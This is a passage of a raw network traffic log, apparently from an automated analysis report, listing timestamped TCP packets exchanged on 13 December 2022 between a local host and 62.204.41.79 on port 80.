                                              Dec 13, 2022 20:09:16.346342087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.346466064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.346606970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.346669912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.346725941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.346755028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.346890926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.346921921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.347093105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.347107887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.347199917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.347364902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.347373962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.347441912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.347547054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.347568989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.347678900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.347794056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.347835064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.347942114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.348078966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.348226070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.348356009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.348498106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.348628998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.348773956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.348922968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.349106073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.349270105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.350621939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.351069927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.351321936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.351365089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.351495981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.351620913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.351742029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.351855040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.351968050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.352080107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.352215052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.352425098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.352556944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.352624893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.352674961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.352679968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.352699995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.352755070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.352818966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.352885008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.352943897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.352955103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.353066921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.353144884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.353188992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.353286028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.353312969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.353435040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.353461981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.353565931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.353565931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.353646040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.353693008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.353820086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.353857994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.353883028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.353950977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.354069948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.354073048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.354201078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.354213953 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.354274988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.354356050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.354429960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.354480028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.354646921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.354671001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.354698896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.354793072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.354795933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.354927063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.354935884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.355047941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.355076075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.355163097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.355205059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.355305910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.355367899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.355406046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.355494976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.355561972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.355739117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.355840921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.355957985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.356115103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.356653929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.356683016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.356707096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.356723070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.356820107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.356969118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.357073069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.357186079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.357355118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.357594967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.357604027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.357784986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.357913017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.358026028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.358195066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.358325958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.358464956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.358587027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.358719110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.358794928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.359009981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.359205961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.359313011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.369427919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.369653940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.369787931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.369952917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.370084047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.370266914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.370400906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.370784998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.370784998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.370904922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371032000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371155977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371316910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371406078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371506929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371599913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371687889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371795893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.371973991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.372104883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.372220993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.372265100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.372284889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.372350931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.372452021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.372566938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.372592926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.372598886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.372695923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.372731924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.372842073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.372883081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.373003960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.373044014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.373054981 CET4974280192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.373152971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.373188019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.373276949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.373316050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.373402119 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.373435974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.373517036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.373641014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.373662949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.373723030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.373795986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.373878956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.373903036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.374051094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.374089003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.374170065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.374239922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.374280930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.374387026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.374521971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.374633074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.374758005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.374831915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.374862909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.374874115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.374910116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.374988079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.375019073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.375202894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.375837088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.375866890 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.375885963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.376000881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.376117945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.376238108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.376440048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.376560926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.376641989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.376852989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.376909971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.377123117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.377276897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.377475977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.377648115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.377710104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.377883911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.377886057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.377994061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.378088951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.378088951 CET4974380192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.378175020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.378197908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.378247976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.378334045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.378401995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.378515959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.378557920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.378633976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.378674030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.378854990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.379035950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.379178047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.379406929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.379565954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.379692078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.379844904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.380006075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.380139112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.380357981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.380600929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.380839109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.380966902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.381103992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.381232023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.381375074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.381542921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.381685972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.381908894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.382652044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.382906914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.383049011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.385808945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.386060953 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.386193991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.386349916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.386526108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.386666059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.386904001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.387049913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.387180090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.387319088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.387440920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.387578964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.387741089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.387878895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.388106108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.388329029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.388448000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.388540030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.388688087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.388751030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.388845921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.388947964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.389060020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.391279936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.391473055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.391618013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.391742945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.391876936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.392083883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.392313957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.392438889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.392575979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.392745972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.392878056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.393096924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.393229008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.393351078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.393456936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.393572092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.393671036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.393826962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.393851042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.393884897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.393990040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.394100904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.394216061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.394448996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.394567966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.394706964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.394830942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.394970894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.395144939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.395324945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.395479918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.395601034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.395757914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.395905018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.395905018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396024942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396128893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396219969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396313906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396403074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396493912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396609068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396701097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396789074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396878958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.396965027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.397056103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.397090912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.397157907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.397245884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.397337914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.397423983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.397515059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.397605896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.397774935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.399377108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.399583101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401551962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401551962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401551962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401551962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401551962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401551962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401551962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401551962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401602983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401602983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401602983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401602983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401602983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401602983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401602983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401602983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401635885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401635885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401635885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401635885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401635885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401635885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.401952982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.402048111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.402236938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.402429104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.402578115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.402764082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.403043985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.403254986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.403542042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.403736115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.403887987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.404015064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.404144049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.404253006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.404378891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.404500008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.404628992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.404751062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.404875040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.405003071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.405174017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.405298948 CET4973680192.168.2.362.204.41.79
